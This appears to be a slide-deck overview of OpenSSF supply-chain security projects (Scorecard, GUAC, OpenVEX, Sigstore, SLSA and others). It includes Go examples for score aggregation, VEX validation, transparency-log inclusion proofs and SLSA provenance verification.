Open Source Security Foundation


Projects Overview

Projects

- Scorecard
- GUAC
- OpenVEX
- Protobom
- bomctl
- SBOMit
- Sigstore
- SLSA
- S2C2F
- Zarf
- gittuf
- OSV Schema
- Package Analysis
- RSTUF
- Best Practices Badge
- Criticality Score
- Fuzz Introspector
- Security Insights Specification


OpenSSF Scorecard

Quickly assess open source projects for risky practices.


OpenSSF Scorecard: Use Cases

For individual maintainers

- Helpful as a pre-launch security checker for a new project or to plan improvements to an existing one.

For an organisation

- Include in CI/CD processes using the GitHub Action and run by default on pull requests.

For consumers

- Helps to make informed decisions about security risks and vulnerabilities.
- Using the public data, evaluate the security posture of over 1 million of the most used OSS projects.
Automated Checks with Weighted Scoring

- 18 checks for vulnerabilities affecting different parts of the software supply chain (the figure groups them into areas such as Code Vulnerabilities, Source Risk Assessment and Holistic Practices)
- Each automated check returns a score out of 10 and a risk level; some checks have staged scoring, others are dichotomous (pass/fail). A check that cannot reach a conclusion returns -1 and is left out of the aggregate.
- The risk level adds weighting to the score
- The weighted values of all checks are compiled into a single, aggregate score

Risk level weights:

Critical risk  10
High risk      7.5
Medium risk    5
Low risk       2.5

https://github.com/ossf/scorecard#scorecard-checks
OpenSSF Scorecard: Running the Checks

- Run automatically on code you own using the GitHub Action
  - Authenticate repo access with a token: the workflow's default GITHUB_TOKEN covers most checks; a Personal Access Token is optional and mainly matters for the Branch-Protection check, which needs admin-level visibility of branch settings to score fully
  - Install the Scorecard action into your code scanning suite
  - Can publish results and display the Scorecard badge on the GitHub repo
- Run manually on your (or somebody else's) project via the command line
  - Check someone else's repository
  - Select which checks you want to run
  - Control how detailed your results are


OpenSSF Scorecard: Viewing Scores

- Use the web viewer to see score reports for projects regularly scanned by Scorecard
  - https://securityscorecards.dev/viewer/?uri=<github_or_gitlab>.com/<user_name_or_org>/<repository_name>
  - Results can be sorted by check name, score, or risk level
- Use the REST API to query pre-calculated scores of OSS projects
- Use the Scorecard CLI to view scores for projects that are not regularly scanned by Scorecard
- OpenSSF Scorecard scans over 1 million of the most critical OSS projects
  - Results published in a BigQuery public dataset
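The two things a consumer does with the numbers above are recompute the aggregate from the per-check scores and gate on individual checks. The following is an added example (not Scorecard's own code) that does both over a constructed JSON result shaped like the CLI's --format=json output and the REST API response. The weighted average mirrors the scheme on the previous slide (Critical 10, High 7.5, Medium 5, Low 2.5, inconclusive checks skipped); the per-check risk levels are copied from the Scorecard checks documentation and should be confirmed for the version you run; the repository, scores, reasons and policy thresholds are invented.

```go
package main

import (
	"encoding/json"
	"fmt"
	"sort"
)

// CheckResult is one entry of the "checks" array in Scorecard's JSON output.
type CheckResult struct {
	Name   string `json:"name"`
	Score  int    `json:"score"` // 0..10, or -1 when the check was inconclusive
	Reason string `json:"reason"`
}

// Result is the top-level document; fields this example does not use are omitted.
type Result struct {
	Repo struct {
		Name string `json:"name"`
	} `json:"repo"`
	Score  float64       `json:"score"`
	Checks []CheckResult `json:"checks"`
}

// riskWeight is the weighting from the slide: a check's risk level becomes its weight.
var riskWeight = map[string]float64{"Critical": 10, "High": 7.5, "Medium": 5, "Low": 2.5}

// checkRisk: risk levels from the Scorecard checks documentation (verify for your version).
var checkRisk = map[string]string{
	"Dangerous-Workflow": "Critical", "Binary-Artifacts": "High", "Code-Review": "High",
	"Maintained": "High", "Signed-Releases": "High", "Token-Permissions": "High",
	"Vulnerabilities": "High", "Pinned-Dependencies": "Medium", "License": "Low",
}

// Aggregate recomputes the weighted average Scorecard reports as the overall score:
// sum(weight*score) / sum(weight) over checks that returned a score. An inconclusive
// check (-1) is left out entirely, so it neither raises nor lowers the aggregate;
// a gate therefore has to look at such checks explicitly (see Policy below).
func Aggregate(checks []CheckResult) (float64, error) {
	var weighted, total float64
	for _, c := range checks {
		risk, ok := checkRisk[c.Name]
		if !ok {
			return 0, fmt.Errorf("check %q has no known risk level", c.Name)
		}
		if c.Score < 0 {
			continue
		}
		weighted += riskWeight[risk] * float64(c.Score)
		total += riskWeight[risk]
	}
	if total == 0 {
		return 0, fmt.Errorf("no conclusive checks")
	}
	return weighted / total, nil
}

// Policy is a hypothetical consumer gate: a minimum score per check, and whether
// an inconclusive result on a required check fails the gate.
type Policy struct {
	MinScore         map[string]int
	FailInconclusive bool
}

// Evaluate returns one line per violation, sorted; an empty result is a pass.
func (p Policy) Evaluate(r Result) []string {
	byName := map[string]CheckResult{}
	for _, c := range r.Checks {
		byName[c.Name] = c
	}
	var findings []string
	for name, floor := range p.MinScore {
		c, ok := byName[name]
		switch {
		case !ok:
			findings = append(findings, name+": not present in result")
		case c.Score < 0 && p.FailInconclusive:
			findings = append(findings, fmt.Sprintf("%s: inconclusive (%s)", name, c.Reason))
		case c.Score >= 0 && c.Score < floor:
			findings = append(findings, fmt.Sprintf("%s: score %d below minimum %d (%s)", name, c.Score, floor, c.Reason))
		}
	}
	sort.Strings(findings)
	return findings
}

// sampleJSON is a constructed result for a fictitious repository; only the shape is real.
const sampleJSON = `{
  "repo": {"name": "github.com/example/widget"},
  "score": 7.9,
  "checks": [
    {"name": "Dangerous-Workflow", "score": 10, "reason": "no dangerous workflow patterns detected"},
    {"name": "Token-Permissions", "score": 0, "reason": "workflow tokens have excessive permissions"},
    {"name": "Signed-Releases", "score": -1, "reason": "no releases found"},
    {"name": "Vulnerabilities", "score": 10, "reason": "0 existing vulnerabilities detected"},
    {"name": "Code-Review", "score": 7, "reason": "7 out of 10 changesets were reviewed"},
    {"name": "Maintained", "score": 10, "reason": "30 commits in the last 90 days"},
    {"name": "Binary-Artifacts", "score": 10, "reason": "no binaries found in the repo"}
  ]
}`

func ParseResult(data []byte) (Result, error) {
	var r Result
	err := json.Unmarshal(data, &r)
	return r, err
}

func main() {
	r, err := ParseResult([]byte(sampleJSON))
	if err != nil {
		panic(err)
	}
	agg, _ := Aggregate(r.Checks)
	fmt.Printf("%s: recomputed aggregate %.2f (reported %.1f)\n", r.Repo.Name, agg, r.Score)
	gate := Policy{MinScore: map[string]int{"Dangerous-Workflow": 10, "Token-Permissions": 5, "Signed-Releases": 5}, FailInconclusive: true}
	for _, f := range gate.Evaluate(r) {
		fmt.Println("FAIL", f)
	}
}
```

The sample shows why gating on the aggregate alone is not enough: the repository scores close to 8 overall even though Token-Permissions is 0, because five other High checks pull the average up and the inconclusive Signed-Releases check is silently excluded.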
OpenSSF Scorecard Report (example output)

Repository: github.com/ossf/scorecard
Commit: f8198b06215375679bede72614179529a19202FF
Generated at: 2023-11-27T18:10:52Z

Dangerous-Workflow: Determines if the project's GitHub Action workflows avoid dangerous patterns.
Signed-Releases: Determines if the project cryptographically signs release artifacts.
Vulnerabilities: Determines if the project has open, known unfixed vulnerabilities.
Binary-Artifacts: Determines if the project has generated executable (binary) artifacts in the source repository.
Code-Review: Determines if the project requires human code review before pull requests (aka merge requests) are merged.
Dependency-Update-Tool: Determines if the project uses a dependency update tool.
Maintained: Determines if the project is "actively maintained".
Token-Permissions: Determines if the project's workflows follow the principle of least privilege.


OpenSSF Scorecard: Sub-projects

- Scorecard API Visualizer: fetches the scorecard data from the OpenSSF Scorecard API and presents it in a user-friendly and interactive visual format
- Scorecard Monitor: simplifies score tracking in organizations with automated markdown and JSON reports, and optional GitHub issue alerts
- Allstar: GitHub App that continuously monitors GitHub organizations or repositories for adherence to security best practices


OpenSSF Scorecard: Get Involved 


Website: https://scorecard.dev 


GitHub: https://github.com/ossf/scorecard 
Slack: #scorecard 


Working Group: Best Practices 
GUAC: Graph for Understanding Artifact Composition

GUAC gives you directed, actionable insights into the security of your software supply chain.

GUAC: Use Cases

For developers

- Identify deprecated and unsupported dependencies
- Discover "version sprawl", where several versions of the same dependency are included
- Locate and remediate vulnerable dependencies
- Identify risky upstreams based on security practices evaluated by OpenSSF Scorecard

For operations engineers

- Locate and remediate vulnerable dependencies

For open source program offices

- Identify strategically important open source upstreams
- Identify open source upstreams that could benefit from security help based on OpenSSF Scorecard results
GUAC: Mapping the relationships between software

GUAC aims to fill in the gaps by ingesting software metadata, like SBOMs, and mapping out relationships between software. When you know how one piece of software affects another, you'll be able to fully understand your software security position and act as needed.

[Figure: an example GUAC dependency graph]
GUAC: Improving Your Software Security Posture

Inputs GUAC ingests: deps.dev (Open Source Insights), VEX, in-toto attestations, OpenSSF Scorecard results, CycloneDX and SPDX SBOMs, OSV vulnerability information, and threat intelligence.

Outputs: insights for policy checks, patch planning, and identifying critical infrastructure.

The GUAC API enables you to:

- Input data sources used by your organization
- Unveil gaps in the software supply chain data using other data sources
- Establish connections between your software catalog
- Identify threats in your supply chain and provide a path to remediation

(Figure © 2024 The GUAC Authors. All rights reserved.)
GUAC: Components

The full GUAC component deployment is a set of asynchronous services that combine to form a robust and scalable pipeline.

- GraphQL Server: abstraction layer for integrations and other components (GraphQL clients such as IDE plugins, CI checks, policy engines, or your own tool)
- Ingestion Pipeline:
  - Collector: reads or watches locations for new documents and collects them when found
  - Ingestor: parses documents (for example, SBOMs) into the GUAC data model/ontology
  - Assembler: puts GUAC objects into the queryable datastore
  - CollectSub: takes identifiers of interest and creates a subscription for collectors to follow

[Figure: GUAC architecture. Data sources (Open Source Insights / deps.dev, OSV, organization software, SPDX and CycloneDX SBOMs) feed the collector; the assembler writes into the datastore behind the GraphQL server, which clients query; CollectSub drives data subscriptions back to the collectors.]
GUAC: Get Involved

Website: https://guac.sh/
GitHub: https://github.com/guacsec/guac
Slack: #guac

Working Group: Supply Chain Integrity
OpenVEX

A simplified Vulnerability Exploitability eXchange implementation

OpenVEX: Use Cases

The primary use cases for VEX are to provide users (e.g., operators, developers, and service providers) additional information on whether a product is impacted by a specific vulnerability in an included component and, if affected, whether there are actions recommended to remediate.
The VEX Statement

VEX centers on the notion of a statement. In short, a statement can be defined as an assertion intersecting a product, a vulnerability, and an impact status:

statement = product(s) + vulnerability + status

- product(s): the software product we are talking about
- vulnerability: typically a CVE related to one of the product's components
- status: one of the impact statuses identified by the VEX working group (not_affected, affected, fixed, under_investigation)
OpenVEX Is...

A Specification

OpenVEX documents are minimal JSON-LD files that capture the minimal requirements for VEX as defined by the VEX working group organized by CISA. The OpenVEX Specification is owned and steered by the community.

A Go Library

The project has a Go library (openvex/go-vex) that lets projects generate, transform and consume OpenVEX files. It enables the ingestion of VEX metadata expressed in other VEX implementations.

A Set of Tools

Work is underway to create the tools software authors and consumers need to handle VEX metadata. The current flagship project is vexctl, a CLI to create, merge and attest VEX documents.
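The statement model above (product + vulnerability + status) and what a consumer should demand of it, as an added example that is not OpenVEX's own code and deliberately uses only the standard library rather than go-vex: it parses a constructed OpenVEX document, rejects statements that do not meet the spec's minimum (a "not_affected" without a justification or impact statement, an "affected" without an action statement), and then applies the document to constructed scanner findings. The purl, author, document id and the CVE-style vulnerability names are placeholders.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Statement is one OpenVEX statement: product(s) + vulnerability + status.
// Only the fields this example needs are modelled; the spec also carries
// subcomponents, per-statement timestamps and more.
type Statement struct {
	Vulnerability   Vulnerability `json:"vulnerability"`
	Products        []Product     `json:"products"`
	Status          string        `json:"status"`
	Justification   string        `json:"justification,omitempty"`
	ImpactStatement string        `json:"impact_statement,omitempty"`
	ActionStatement string        `json:"action_statement,omitempty"`
}

type Vulnerability struct {
	Name string `json:"name"` // usually a CVE or other advisory identifier
}

type Product struct {
	ID string `json:"@id"` // typically a package URL (purl)
}

// Document is the OpenVEX JSON-LD envelope around the statements.
type Document struct {
	Context    string      `json:"@context"`
	ID         string      `json:"@id"`
	Author     string      `json:"author"`
	Timestamp  string      `json:"timestamp"`
	Version    int         `json:"version"`
	Statements []Statement `json:"statements"`
}

// The four impact statuses defined by the VEX working group.
var validStatus = map[string]bool{"not_affected": true, "affected": true, "fixed": true, "under_investigation": true}

// Validate enforces what a consumer must insist on before trusting a document.
// A bare, unexplained "not_affected" is exactly what a careless vendor (or an
// attacker who controls the feed) would emit to silence a scanner, so it is
// rejected rather than honoured.
func Validate(d Document) error {
	if d.Context == "" || d.ID == "" || d.Author == "" {
		return fmt.Errorf("document missing @context, @id or author")
	}
	for i, s := range d.Statements {
		switch {
		case s.Vulnerability.Name == "":
			return fmt.Errorf("statement %d: missing vulnerability", i)
		case len(s.Products) == 0:
			return fmt.Errorf("statement %d: missing products", i)
		case !validStatus[s.Status]:
			return fmt.Errorf("statement %d: unknown status %q", i, s.Status)
		case s.Status == "not_affected" && s.Justification == "" && s.ImpactStatement == "":
			return fmt.Errorf("statement %d: not_affected needs a justification or impact_statement", i)
		case s.Status == "affected" && s.ActionStatement == "":
			return fmt.Errorf("statement %d: affected needs an action_statement", i)
		}
	}
	return nil
}

// Finding is a constructed scanner result: a product purl and a vulnerability id.
type Finding struct {
	Product, Vulnerability string
}

// Apply keeps the findings a VEX-aware scanner should still report: those with no
// matching statement, or whose latest matching status is still "affected" or
// "under_investigation". Matching "not_affected" and "fixed" statements suppress.
func Apply(d Document, findings []Finding) []Finding {
	status := map[Finding]string{}
	for _, s := range d.Statements { // later statements override earlier ones
		for _, p := range s.Products {
			status[Finding{p.ID, s.Vulnerability.Name}] = s.Status
		}
	}
	var open []Finding
	for _, f := range findings {
		if st := status[f]; st == "not_affected" || st == "fixed" {
			continue
		}
		open = append(open, f)
	}
	return open
}

// sampleVEX is a constructed document; ids, purl and vulnerability names are placeholders.
const sampleVEX = `{
  "@context": "https://openvex.dev/ns/v0.2.0",
  "@id": "https://example.com/vex/2024-01-15-widget",
  "author": "security@example.com",
  "timestamp": "2024-01-15T10:00:00Z",
  "version": 1,
  "statements": [
    {"vulnerability": {"name": "CVE-2099-0001"}, "products": [{"@id": "pkg:golang/example.com/widget@1.4.0"}],
     "status": "not_affected", "justification": "vulnerable_code_not_in_execute_path"},
    {"vulnerability": {"name": "CVE-2099-0002"}, "products": [{"@id": "pkg:golang/example.com/widget@1.4.0"}],
     "status": "affected", "action_statement": "upgrade to widget 1.4.1"}
  ]
}`

// LoadDocument parses and validates; an invalid document is not applied at all.
func LoadDocument(data []byte) (Document, error) {
	var d Document
	if err := json.Unmarshal(data, &d); err != nil {
		return d, err
	}
	return d, Validate(d)
}

func main() {
	d, err := LoadDocument([]byte(sampleVEX))
	if err != nil {
		panic(err)
	}
	prod := "pkg:golang/example.com/widget@1.4.0"
	findings := []Finding{{prod, "CVE-2099-0001"}, {prod, "CVE-2099-0002"}, {prod, "CVE-2099-0003"}}
	for _, f := range Apply(d, findings) {
		fmt.Printf("still open: %s in %s\n", f.Vulnerability, f.Product)
	}
}
```

In production the document would come from vexctl or go-vex and be attached to the artifact (OpenVEX documents can be wrapped as in-toto attestations and signed), so that a consumer can also check who made the "not_affected" claim before suppressing a finding.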


OpenVEX: Ecosystem

The project has a growing ecosystem with known implementations in:

- Go (original): https://github.com/openvex/go-vex
- .NET: NuGet, GitHub
- Rust: https://docs.rs/openvex/latest/openvex/
OpenVEX: Get Involved

- GitHub: https://github.com/openvex
- Slack: #sig-openvex
- Special Interest Group: OpenVEX
Protobom

A format-neutral SBOM data representation and I/O library

- Protocol buffers representation of SBOM data
- Able to ingest documents in modern SPDX and CycloneDX versions without loss
- Accompanying Go library generated from the protocol buffers definition that also implements ingesters for those formats
- Standard SBOMs are read by a reader using parsers that understand the common formats
- Parsers create a neutral protobom document from data read from CycloneDX or SPDX documents
- The neutral document can be rendered into standard SBOM formats by the writer using serializers
Protobom: Usage

The protobom library can be used to read in and write out SBOM documents in these formats:

Format     Version  Encoding   Read       Write
SPDX       2.2      JSON       planned    -
SPDX       2.2      tag-value  planned    -
SPDX       2.3      JSON       supported  supported
SPDX       2.3      tag-value  planned    -
SPDX       3.0      JSON       planned    planned
CycloneDX  1.4      JSON       supported  supported
CycloneDX  1.5      JSON       supported  supported
Protobom: Examples

- The sbom-convert project
  - https://github.com/protobom/sbom-convert provides a complete example of using the library to ingest an SBOM into the protobom intermediate format and then write out a new SBOM document in a different format.
- Read in an SBOM document to work with specific field(s)
  - The protobom library is the best and easiest way to interact with SBOM documents using the Go programming language.
- Generate an SBOM document programmatically
  - The protobom intermediate representation can also be used to create a new SBOM document. Developers create a new protobom document and use Go to populate the fields needed in the SBOM document.

Protobom: Get Involved

- GitHub: https://github.com/protobom/protobom
- Slack: #protobom
- Working Group: Security Tooling
SBOMit

Specification of an SBOM format independent method for attesting components

An SBOMit document is effectively an SBOM, only with additional verification information added that was generated at the time the supply chain was generated. This verification information, which uses in-toto attestations and layouts, can be validated by a party to get a high degree of assurance about the software.
SBOMit: Document Components

- A series of in-toto attestations that were generated as the described software was created
  - Detailed information about steps of the software supply chain
- An in-toto layout signed by the project owner
  - Describes what valid attestation metadata for the project looks like
- Supplemental SBOM information
  - Along with the in-toto attestations and in-toto layout, can be used to derive an actual SBOM in a variety of formats

SBOMit: Advantages

- Generated at the time the software is being processed through the software supply chain
  - More accurate than scanning tools that use incomplete information to try to recover what happened in the past
- Contains cryptographically signed metadata about all of the steps that went into making the software
  - Much harder for accidental inaccuracies like skipping a step, or for malicious actions, to go undetected
- Provides greater ability to securely recover from a compromise

SBOMit: Get Involved

- GitHub: https://github.com/sbomit
- Slack: #sbomit
- Working Group: Security Tooling


Sigstore

A wax seal of security for the digital era.

Sigstore: Vision

Sigstore was started to improve supply chain technology for anyone using open source projects. It's for open source maintainers, by open source maintainers.

And it's a direct response to today's challenges, a work in progress for a future where the integrity of what we build and use is up to standard.
Sigstore: How it Works

Sigstore is a set of tools developers, software maintainers, package managers and security experts can benefit from. Bringing together free-to-use open source technologies like Fulcio, Cosign and Rekor, it handles digital signing, verification and checks for provenance needed to make it safer to distribute and use open source software.

[Figure: the signing flow. Sign and publish artifacts; publish signing certificates (Fulcio certificate authority, certificate transparency log); monitor logs (signature transparency log, key transparency log); all anchored in a trust root.]

A standardized approach

This means that open source software uploaded for distribution has a stricter, more standardized way of checking who's been involved and that it hasn't been tampered with. Because signing keys are short-lived and discarded after use, there is no long-lived private key for an attacker to steal, so third parties can't hijack a release by reusing a stolen key and slip in something malicious. The identity account used to obtain the certificate still has to be protected; the transparency logs exist so that any misuse of an identity is visible to the owner and to monitors.
Sigstore: Components

- Cosign: user-friendly tool to sign and verify software artifacts and container images.
- Fulcio: certificate authority to issue short-lived identity-based code-signing certificates.
- Rekor: transparency log providing a tamper-resistant record of software signatures and metadata.
- Gitsign: sign Git commits with your own GitHub / OIDC identity.
Sigstore: Benefits

- Previous tools to cryptographically sign OSS packages were often unused
  - No widely-practical mechanism to determine if the public keys used are correct, so verification was impractical
  - No easy way to detect malicious signing
  - Key revocation typically impractical in practice
- Sigstore is a free-to-use non-profit software signing service
  - Users generate ephemeral short-lived key pairs using the sigstore client tooling
  - The sigstore PKI service provides a signing certificate generated upon a successful OpenID Connect grant
  - All certificates are recorded in a certificate transparency log
  - Software signing materials are sent to a signature transparency log
  - Guarantees that the claimed user controlled their identity service provider's account at the time of signing
  - Once the signing operation is complete, the keys can be discarded, removing any need for further key management or need to revoke or rotate
  - Using OpenID Connect identities enables use of existing security controls such as 2FA, OTP and hardware token generators
  - Enables using a cloud CI/CD provider without maintaining a private key
  - Transparency logs are public and open; anyone can monitor transparency logs for issues
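The "tamper-resistant record" and "anyone can monitor" claims above rest on the log being a Merkle tree whose inclusion proofs a client checks itself. As an added example (not Sigstore's or Rekor's code), the following builds a small RFC 6962-style log from constructed entries, produces the audit path for one entry, and verifies it against the root with the algorithm from RFC 9162 section 2.1.3.2. Rekor's tree uses the same leaf and node hashing (Trillian); what a real client additionally checks, and what is omitted here, is the log's signature over the root (the checkpoint) and the consistency proof between successive roots.

```go
package main

import (
	"bytes"
	"crypto/sha256"
	"fmt"
)

// leafHash and nodeHash follow RFC 6962: a one-byte domain separator keeps a
// leaf from ever being interpretable as an interior node (second-preimage defence).
func leafHash(entry []byte) []byte {
	h := sha256.New()
	h.Write([]byte{0x00})
	h.Write(entry)
	return h.Sum(nil)
}

func nodeHash(left, right []byte) []byte {
	h := sha256.New()
	h.Write([]byte{0x01})
	h.Write(left)
	h.Write(right)
	return h.Sum(nil)
}

// largestPowerOfTwoBelow returns the largest power of two strictly less than n (n > 1).
func largestPowerOfTwoBelow(n int) int {
	k := 1
	for k*2 < n {
		k *= 2
	}
	return k
}

// RootHash is MTH(D[n]) from RFC 6962 section 2.1.
func RootHash(entries [][]byte) []byte {
	switch len(entries) {
	case 0:
		return sha256.New().Sum(nil)
	case 1:
		return leafHash(entries[0])
	}
	k := largestPowerOfTwoBelow(len(entries))
	return nodeHash(RootHash(entries[:k]), RootHash(entries[k:]))
}

// InclusionProof is PATH(m, D[n]) from RFC 6962 section 2.1.1: the sibling
// hashes needed to recompute the root from entries[index] alone.
func InclusionProof(index int, entries [][]byte) [][]byte {
	n := len(entries)
	if n <= 1 {
		return nil
	}
	k := largestPowerOfTwoBelow(n)
	if index < k {
		return append(InclusionProof(index, entries[:k]), RootHash(entries[k:]))
	}
	return append(InclusionProof(index-k, entries[k:]), RootHash(entries[:k]))
}

// VerifyInclusion is what the client runs: it needs only the entry it submitted,
// the index and tree size the log reported, the audit path, and a root it trusts.
func VerifyInclusion(entry []byte, index, treeSize int, proof [][]byte, root []byte) bool {
	if index >= treeSize {
		return false
	}
	fn, sn := index, treeSize-1
	r := leafHash(entry)
	for _, p := range proof {
		if sn == 0 {
			return false
		}
		if fn&1 == 1 || fn == sn {
			r = nodeHash(p, r)
			if fn&1 == 0 { // right-most leaf of a partial subtree
				for fn&1 == 0 && fn != 0 {
					fn >>= 1
					sn >>= 1
				}
			}
		} else {
			r = nodeHash(r, p)
		}
		fn >>= 1
		sn >>= 1
	}
	return sn == 0 && bytes.Equal(r, root)
}

func main() {
	// Constructed entries standing in for Rekor entries (which are canonical JSON
	// of the signature, the signing certificate and the artifact digest).
	var entries [][]byte
	for i := 0; i < 5; i++ {
		entries = append(entries, []byte(fmt.Sprintf("entry %d: signature over artifact-%d", i, i)))
	}
	root := RootHash(entries)
	proof := InclusionProof(2, entries)
	fmt.Println("entry 2 included:", VerifyInclusion(entries[2], 2, len(entries), proof, root))
	fmt.Println("forged entry:    ", VerifyInclusion([]byte("forged"), 2, len(entries), proof, root))
}
```

A log operator who wanted to hide or alter an entry after the fact would have to produce a different root, which every client and monitor holding the earlier signed root can detect.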
Sigstore: Get Involved

Website: https://www.sigstore.dev/
GitHub: https://github.com/sigstore/
Slack: sigstore.slack.com
Training: LFS182
Supply-chain Levels for Software Artifacts (SLSA)

Safeguarding artifact integrity across any software supply chain

Supply-chain Levels for Software Artifacts, or SLSA ("salsa").

It's a security framework, a checklist of standards and controls to prevent tampering, improve integrity, and secure packages and infrastructure. It's how you get from "safe enough" to being as resilient as possible, at any link in the chain.

If an SBOM is like a list of ingredients, SLSA is like all of the food safety handling guidelines that make an ingredient list credible.
SLSA: Use Cases

SLSA is for everyone involved in producing, consuming, and providing infrastructure for software such as build platforms and package ecosystems.

- Producers: for protection against tampering and insider threats
- Consumers: to verify the software they rely on is secure
- Infrastructure Providers: as a guideline for hardening build platforms and processes
SLSA: The Supply Chain Problem

Any software can introduce vulnerabilities into a supply chain. As a system gets more complex, it's critical to already have checks and best practices in place to guarantee artifact integrity, that the source code you're relying on is the code you're actually using. Without solid foundations and a plan for the system as it grows, it's difficult to focus your efforts against tomorrow's next hack, breach or compromise.

[Figure: the SLSA threat model, one threat per link of the chain]

Source threats
- A: Submit unauthorized change
- B: Compromise source repo
- C: Build from modified source

Dependency threats
- D: Use compromised dependency

Build threats
- E: Compromise build process
- F: Upload modified package
- G: Compromise package registry
- H: Use compromised package
SLSA offers...

- A common vocabulary to talk about software supply chain security
- A way to secure your incoming supply chain by evaluating the trustworthiness of the artifacts you consume
- An actionable checklist to improve your own software's security
- A way to measure your efforts toward compliance with forthcoming Executive Order standards in the Secure Software Development Framework (SSDF)
SLSA: Levels of Assurance

- Common language for security of software, supply chains and their components
- Industry-recognized best practices to create four compliance levels of increasing assurance
- Levels look at the builds, sources and dependencies in open source or commercial software

Level     Requirements                                             Focus
Build L0  No guarantees (no provenance)                            -
Build L1  Provenance showing how the package was built             Mistakes, documentation
Build L2  Signed provenance, generated by a hosted build platform  Tampering after the build
Build L3  Hardened build platform                                  Tampering during the build
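Provenance only raises assurance if the consumer checks it, and the table above says what to check: that the provenance describes this exact artifact, that it was produced by a builder trusted at the required level, and that the build came from the expected source. The following is an added example (not SLSA's or slsa-verifier's code) that runs those content checks over a constructed in-toto Statement with a SLSA v1 provenance predicate. It assumes the signature over the statement (the DSSE envelope) has already been verified against the builder's signing identity by slsa-verifier or cosign, which is the step that makes Build L2 and L3 meaningful and is not repeated here. The artifact bytes, repository and workflow path are invented; the builder ID is that of the slsa-github-generator generic workflow, and the level assigned to it is the policy's own trust decision.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"fmt"
	"strings"
)

// Statement is the in-toto Statement envelope; only the fields the policy needs are modelled.
type Statement struct {
	Type          string    `json:"_type"`
	Subject       []Subject `json:"subject"`
	PredicateType string    `json:"predicateType"`
	Predicate     Predicate `json:"predicate"`
}

type Subject struct {
	Name   string            `json:"name"`
	Digest map[string]string `json:"digest"`
}

// Predicate is the SLSA v1 provenance predicate.
type Predicate struct {
	BuildDefinition struct {
		BuildType          string          `json:"buildType"`
		ExternalParameters json.RawMessage `json:"externalParameters"` // layout depends on buildType
	} `json:"buildDefinition"`
	RunDetails struct {
		Builder struct {
			ID string `json:"id"`
		} `json:"builder"`
	} `json:"runDetails"`
}

// Policy is the consumer's trust decision: which builder IDs it accepts and
// at which Build level, which source repository it expects, and the minimum level.
type Policy struct {
	TrustedBuilders map[string]int
	SourceRepo      string
	MinLevel        int
}

// Verify runs the content checks on an already signature-verified statement and
// returns the Build level the provenance supports under the policy.
func Verify(stmt Statement, artifact []byte, p Policy) (int, error) {
	if stmt.Type != "https://in-toto.io/Statement/v1" || stmt.PredicateType != "https://slsa.dev/provenance/v1" {
		return 0, fmt.Errorf("unexpected statement/predicate type %q / %q", stmt.Type, stmt.PredicateType)
	}
	sum := sha256.Sum256(artifact)
	want := hex.EncodeToString(sum[:])
	matched := false
	for _, s := range stmt.Subject {
		if strings.EqualFold(s.Digest["sha256"], want) {
			matched = true
		}
	}
	if !matched {
		return 0, fmt.Errorf("artifact sha256 %s is not a subject of this provenance", want)
	}
	id := stmt.Predicate.RunDetails.Builder.ID
	level, ok := p.TrustedBuilders[id]
	if !ok {
		return 0, fmt.Errorf("untrusted builder %q", id)
	}
	if level < p.MinLevel {
		return level, fmt.Errorf("builder %q is trusted for Build L%d, policy requires L%d", id, level, p.MinLevel)
	}
	// The GitHub Actions buildType places the source under workflow.repository
	// (assumed here); other build types lay externalParameters out differently.
	var ext struct {
		Workflow struct {
			Repository string `json:"repository"`
			Ref        string `json:"ref"`
		} `json:"workflow"`
	}
	if err := json.Unmarshal(stmt.Predicate.BuildDefinition.ExternalParameters, &ext); err != nil {
		return level, fmt.Errorf("externalParameters: %w", err)
	}
	if ext.Workflow.Repository != p.SourceRepo {
		return level, fmt.Errorf("built from %q, expected %q", ext.Workflow.Repository, p.SourceRepo)
	}
	return level, nil
}

// SampleStatement constructs a provenance for the given bytes so the example is
// self-contained; a real one is emitted and signed by the build platform.
func SampleStatement(artifact []byte) Statement {
	sum := sha256.Sum256(artifact)
	raw := fmt.Sprintf(`{
  "_type": "https://in-toto.io/Statement/v1",
  "subject": [{"name": "widget-linux-amd64", "digest": {"sha256": "%s"}}],
  "predicateType": "https://slsa.dev/provenance/v1",
  "predicate": {
    "buildDefinition": {
      "buildType": "https://slsa-framework.github.io/github-actions-buildtypes/workflow/v1",
      "externalParameters": {"workflow": {"ref": "refs/tags/v1.4.0",
        "repository": "https://github.com/example/widget", "path": ".github/workflows/release.yml"}}
    },
    "runDetails": {"builder": {"id": "https://github.com/slsa-framework/slsa-github-generator/.github/workflows/generator_generic_slsa3.yml@refs/tags/v1.9.0"}}
  }
}`, hex.EncodeToString(sum[:]))
	var s Statement
	if err := json.Unmarshal([]byte(raw), &s); err != nil {
		panic(err)
	}
	return s
}

func main() {
	artifact := []byte("constructed release binary contents\n")
	policy := Policy{
		TrustedBuilders: map[string]int{"https://github.com/slsa-framework/slsa-github-generator/.github/workflows/generator_generic_slsa3.yml@refs/tags/v1.9.0": 3},
		SourceRepo:      "https://github.com/example/widget",
		MinLevel:        3,
	}
	stmt := SampleStatement(artifact)
	fmt.Println(Verify(stmt, artifact, policy))
	fmt.Println(Verify(stmt, []byte("tampered"), policy))
}
```

Pinning the builder ID to a tag, as the policy does, matters: the ID is the identity the signature was verified against, and a floating reference would let a later, weaker workflow version satisfy the same policy.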
SLSA: Get Involved


Website: https://slsa.dev/ 
GitHub: https://github.com/slsa-framework/slsa 
Slack: #slsa 


Working Group: Supply Chain Integrity 
Zarf

A free open source tool that enables continuous software delivery on systems that are disconnected from the internet.

DevSecOps for Airgap

Zarf eliminates the complexity of air gap software delivery for Kubernetes clusters and cloud-native workloads using a declarative packaging strategy to support DevSecOps in offline and semi-connected environments.

Modern software assumes your systems have access to the internet. This may work for 99% of the world, but certain SECURE systems need to maintain capabilities while being disconnected or intermittently disconnected from the internet. Zarf keeps your software running, no matter your connection status.
Zarf: Use Cases

- Intermittently Connected Systems
  - Some systems experience disconnection occasionally due to temporary loss of access, like a rocket going around the moon. Zarf keeps those systems running.
- Always Disconnected
  - Other systems are always disconnected due to lack of internet access. Maybe they are underground, underwater, or on another planet.
- Situationally Disconnected Systems
  - The world's most important infrastructure needs to be able to control its connection to the internet and still run in the case of internet loss or a cyber attack.
Zarf: Use it to...

- Securely Package Apps & Resources
  - Package a chunk of the internet and securely deliver all of the files and dependencies needed to run an application in a disconnected environment.
- Deploy Cloud Apps While Disconnected
  - Deploy apps declaratively and without internet connectivity. This opens the door for modern cloud capabilities to be deployed in disconnected environments.
